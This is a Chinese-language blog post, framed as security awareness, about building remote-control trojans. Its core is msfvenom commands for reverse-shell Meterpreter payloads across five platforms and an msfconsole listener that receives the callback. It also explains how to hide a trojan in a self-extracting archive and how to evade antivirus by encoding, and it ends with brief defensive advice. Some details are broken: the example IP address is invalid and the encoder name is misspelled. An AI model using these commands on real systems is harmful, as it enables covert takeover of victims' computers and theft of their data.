浅谈木马远控
在听过某网安教育关于浅谈的公开课后,结合本人学过的东西,以及自己实践过的经历。在此分享下木马对我们的影响。
环境:
攻击者:kali
目标主机:Windows
一、了解木马
1.木马,又称为特洛伊木马
特洛伊木马(Trojan Horse),这个名字源于公元前十二世纪希腊与特洛伊之间的一场战争。古希腊围攻特洛伊许久却无法攻下,于是有人想到了个办法。制作了一个很高很大的木马作为战神马,内部可装士兵,佯攻几天后装作无功而返,留下木马。特洛伊解围后认为自己胜利了,还看到了敌人留下的木马,便作为战利品收入城中,全城举杯庆祝。到了午夜时分,藏匿于木马中的士兵便打开了城门,四处纵火,城外伏兵涌入,很容易便得到了城池。 在如今,我们常将寄宿在计算机中的未授权的远程控制程序称为特洛伊木马。它可以计算机管理员未发觉的情况下执行命令、泄露用于信息、甚至可以窃取管理员用户权限。如今已成为黑客常用的工具之一。
2.木马原理、结构
原理:特洛伊木马是一道程序,藏匿于计算机中,通过对开启计算机的某一端口进行监听,在接受到数据后进行识别,再对计算机执行相应的操作。
其本质是占用一个端口与攻击者进行通信的网络程序。
结构:
(1)客户端
客户端程序
客户端程序是攻击者的控制台,它负责远程遥控指挥。
(2)服务器端
服务器端程序
服务器端程序即木马程序,它隐藏安装在目标主机上,目标主机也称为肉鸡。
二、制作简易木马
此处我们利用msfvenom制作木马程序。
Windows木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f exe -o muma.exe
-p 载荷(payload),用于反弹shell
lhost= 这里写的是攻击者的IP
lport= 这里写的是攻击者主机上用于监听的端口(任意未被占用的端口)
-f 文件类型
-o 输出的文件名
Linux木马
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f elf -o muma.elf
android木马
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -o muma.apk
php木马
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.php
python木马
msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.520.520 lport=4444 -f raw -o muma.py
利用msfvenom制作木马时,选择payload和文件类型需要注意。
三、木马的危害
由于本文探讨木马远控,这里就暂时省略文件上传、命令执行下载木马等方式将木马传入目标主机的讨论。
这里我们直接将制作好的木马放在一个Windows主机中(网络互通),然后在客户端(攻击者)利用msfconsole开启监听
msfconsole
use exploit/multi/handler #进入监听模块
set payload windows/meterpreter/reverse_tcp #加载payload模块
set lhost 本机IP
set lport 4444
exploit/run
开启监听后,我们在目标主机上运行一下木马程序。
此时我们可以看到已经连接上了木马程序。
当我们的电脑被木马控制后,我们电脑中的信息可能会被泄露,包括系统信息、用户存储在电脑上的数据信息等。
除过电脑上的信息可能会被攻击者窃取,攻击者还可能控制电脑对数据进行删改,可以上传和下载文件,盗取计算机中的密码等操作。甚至可以以感染了木马的主机为跳板,攻击该网络下的其他主机等操作。
可能到了这里有人会觉得这些木马很简单,很容易就被目标发现。
攻击者想要在不被发现的情况下在目标主机上种下木马,可以进行木马捆绑、免杀、伪装等操作。
木马捆绑:
制作自解压木马(准备一个木马、一个图片、一个压缩软件即可)
攻击者可以制作一个自解压木马,诱导目标解压压缩包。在目标解压压缩文件的同时会运行压缩文件里的木马程序,从而被控制。(当你从一些奇怪的地方下载了一些奇怪的压缩包的时候,可能这个压缩包里面就捆绑了木马,当你一解压,它会自动运行里面的木马程序。)
可能很多时候我们的杀毒软件够强大,可以检测到捆绑了木马的压缩文件。然而攻击者还有方法。
木马免杀:
攻击者可以对木马程序进行一些免杀操作,从而绕过一些防护软件。
常用到的免杀方法有:编码加密、加壳(压缩算法)、利用一些工具进行免杀等。
在利用msfvenom制作木马时,可以使用-e x86/shikata_ganai参数进行加密。
Msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ganai -i 30 -b ’\x00’ lhost=hackIP lport=4444 -f exe -o muma.exe
-e 编码的方式 -i 编码次数 -b不使用十六进制00
一些其他的编码方式,可以使用msfvenom -l encoders命令查看
四、木马防护
1.木马的传播途径
(1)利用下载进行传播
(2)利用系统漏洞传播
(3)利用邮件传播
(4)利用即使通信传播
(5)利用网页传播
(6)利用蠕虫病毒传播等
2.木马的防范与查杀
(1)首先安装杀毒软件
(2)不执行奇怪的软件,使用的软件尽量从官方下载安装
(3)不随便打开奇怪的邮件
(4)尽量少使用或者不使用共享文件夹
(5)不点击奇怪的链接等
本文只是简单讨论下木马远控,为了提高自己和身边亲友的安全意识,后期会有对木马的深入探讨。本文可能会有很多遗漏的地方和不对的地方,欢迎各位大佬指点,文中很多是个人观点,也欢迎各位朋友发表自己的观点看法。